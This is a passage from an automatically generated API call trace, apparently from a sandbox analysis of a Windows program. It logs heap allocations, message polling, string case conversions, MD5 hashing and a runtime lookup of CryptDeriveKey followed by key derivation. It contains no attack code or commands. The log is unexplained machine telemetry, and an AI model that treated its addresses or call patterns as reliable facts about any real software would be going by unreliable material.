Size=0x10) returned 0x34aa4c0 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.763] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.764] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0163.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0163.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.765] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0163.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0163.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0163.767] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.767] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0163.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.768] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0163.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0163.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.769] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.769] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.769] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.769] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.769] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0163.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa640, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.773] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0163.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.774] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.775] RtlAllocateHeap 